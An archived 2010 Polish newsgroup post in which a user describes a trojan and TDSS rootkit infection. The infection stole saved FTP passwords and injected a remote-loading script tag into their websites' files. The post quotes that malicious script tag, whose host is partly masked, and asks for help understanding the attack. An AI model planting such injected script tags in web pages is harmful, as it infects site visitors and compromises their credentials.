eGospodarka.pl
eGospodarka.pl poleca

eGospodarka.plGrupypl.comp.www[OT] Jak strasznie groźny może być kawałek kodu Java Script[OT] Jak strasznie groźny może być kawałek kodu Java Script
  • Path: news-archive.icm.edu.pl!news.gazeta.pl!not-for-mail
    From: "latet" <l...@l...pl>
    Newsgroups: pl.comp.www
    Subject: [OT] Jak strasznie groźny może być kawałek kodu Java Script
    Date: Wed, 16 Jun 2010 15:27:12 +0200
    Organization: "Portal Gazeta.pl -> http://www.gazeta.pl"
    Lines: 99
    Message-ID: <hvajfg$fit$1@inews.gazeta.pl>
    NNTP-Posting-Host: ds242.internetdsl.tpnet.pl
    Mime-Version: 1.0
    Content-Type: text/plain; format=flowed; charset="iso-8859-2"; reply-type=original
    Content-Transfer-Encoding: 8bit
    X-Trace: inews.gazeta.pl 1276694832 15965 80.53.254.242 (16 Jun 2010 13:27:12 GMT)
    X-Complaints-To: u...@a...pl
    NNTP-Posting-Date: Wed, 16 Jun 2010 13:27:12 +0000 (UTC)
    X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5931
    X-Priority: 3
    X-Newsreader: Microsoft Outlook Express 6.00.2900.5931
    X-User: latet
    X-MSMail-Priority: Normal
    Xref: news-archive.icm.edu.pl pl.comp.www:396158
    [ ukryj nagłówki ]

    Witam,

    Czy jest możliwe, że po wejściu na stronę www, na której znajduje się złośliwy
    kod JS typu:

    <script type="text/javascript"
    src="http://blog.XXXXXXomestore.com:8080/File.js"></
    script>

    doszło do tak poważnych szkód jak:

    1. istalacja w systemie trojana
    2. instalacja root-kita, który ukrywa trojana
    3. kradzież haseł do licznych kont FTP z ustawień Total Commandera!
    4. wklejenie złośliwego kodu JS do setek plików na wszystkich serwerach do
    których udało się robotowi zalogować dzięki ukradzionym tak hasłom do FTP.
    Masakra!

    Bo wczoraj tak się właśnie u mnie stało - mimo, ze cały czas działał Kaspersky.
    Nie wiem tylko czy rzeczywiscie było tak, jak myślę, czy może zagrożenie wdarło
    się inaczej?

    Z moje strony wyglądało to tak:

    1. Otrzymałem mailem czystko tekstowy (ASCII) załącznik .html

    2. Skopiowałem go na pulpit i przeksnowałem antywirem - czysty.

    3. Otworzyłem go EditPlusem, w środku zobaczyłem tylko taki kod JS jak wyżej.

    4. Dibaeł mnie skusić, aby to odpalić pod FireFox - odpaliłem.

    5. Kaspersky (heuristic) podniósł alarm, że złośliwy kod i że ZOSTAŁ
    ZABLOKOWANY.

    6. Myślałem więc, że nic sie nie stało i chyba się myliłem. Ale wtedy jeszcze
    nie zauważyłem nic.

    7. Wyłączyłem kompa i poszedłem do pracy.

    8. Wróćiłem, odpalam kompa i zaczęły się pojawiać dość subtelne objawy infekcji,
    mianowicie:

    a) podczas wyszukiwania czegokolwiek w Google Kaspersky alarmwował, że
    blokuje jakieś adresy Phishingowe.

    b) w "msconfig" / "autostart" pojawiła sie pozycja wwwamq32.exe, której nie
    dawało się wyłączyć (tzn. dawało sie, ale włączała sie spowrotem".

    9. Zapuściłem skan Kasperskim i wykrył w pamieci RAM obecnosc rootkita
    Rootkit.Win32.TDSS.bgqo. Probował go usuwać - wymuszajac podczas tej procedury
    restart systemu, ale bezskutecznie.

    10. Dopiero Kaspersky odpalony spod innego systetmu znalazł i usunął szkodnika w
    3 miejscach:
    http://www.medfoto.pl/img/rootkit.png

    Myślałem, że już po sprawie, ale to był dopiero początek...

    Wszedłem na jedną ze stron, które prowadzę i Kapsersky podniósł alarm, ze
    zablokował na niej złośliwy skrypt. Zalogowałem sie przez FTP i zobaczyłem, że
    wszelkie pliki index.php, wszystkie pliki *.js i trochę innych, zostało
    zmodyfikowanych - dopisany do nich został cytowany na początku kod JS.

    Pół nocy siedziałem i wywalałem złośliwy kod.
    Na szczęście w tych godzinach ruch na stronach znikomy, ale pewnie parę osób się
    zaraziło, nie wiem tylko jak poważnie, czy w taki sam sposób jak mój komp
    pierwotnie (przypomnę, że ja odpaliłem plik z kodem JS lokalnie, a nie z netu -
    być moze to czyni różnicę?).

    W międzyczasie Kaspersky przestał blokować strony na których złośliwy kod
    jeszcze był. Wygląda na to, że mają one z góry ustaloną na krótki czas
    żywotność.

    Oczywiście zmieniłem jeszcze wszystkie hasła, w tym hasła do baz SQL, które
    przecież po zalogowaniu się przez FTP robot mógł ukraść z plików config. forum
    phpBB.

    Dla mnie morał jest taki, że nie wolno trzymać haseł do kont FPT zapisanych w
    kliencie FTP. Trzeba je mieć w głowie.

    Swoją drogą - nie wiem jeszcze, czy wirus ten nie ukradł też jakichś innych
    haseł, np. zapisanych w przeglądarkach www. Tych na szczęście miałem mało,
    głównie do jakichś Forum, gdzie mam uprawnienia szargo użytkownika.

    Ale powtórzę pytanie początkowe - czy to wszystko mogło sie zacząć od
    "niewinnego" kodu JS? Czy JS ma taki potencjał, że moze zmusić przeglądarkę do
    zainstalowania takiego syfu bez zgody użytkownika? Przecież rootkit, to niemal
    jak driver systemowy. Zapewniam, że nie byłem pytany o żadne potwierdzenia.
    Wszystko się zainstalowało po cichu (Win XP, kotno z uprawnieniami admina).

    Jeśli to się zaczęło przez JS, to jestem przerażony...
    Jeśli inaczej - to jestem załamany, że nie wiem jak.
    Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś tam
    blokuje, ale jednak z zerowym efektem!

    Dzięki,

    latet

Podziel się

Poleć ten post znajomemu poleć

Wydrukuj ten post drukuj


Następne wpisy z tego wątku

Najnowsze wątki z tej grupy


Najnowsze wątki

Szukaj w grupach

Eksperci egospodarka.pl

1 1 1

Wpisz nazwę miasta, dla którego chcesz znaleźć jednostkę ZUS.

Wzory dokumentów

Bezpłatne wzory dokumentów i formularzy.
Wyszukaj i pobierz za darmo: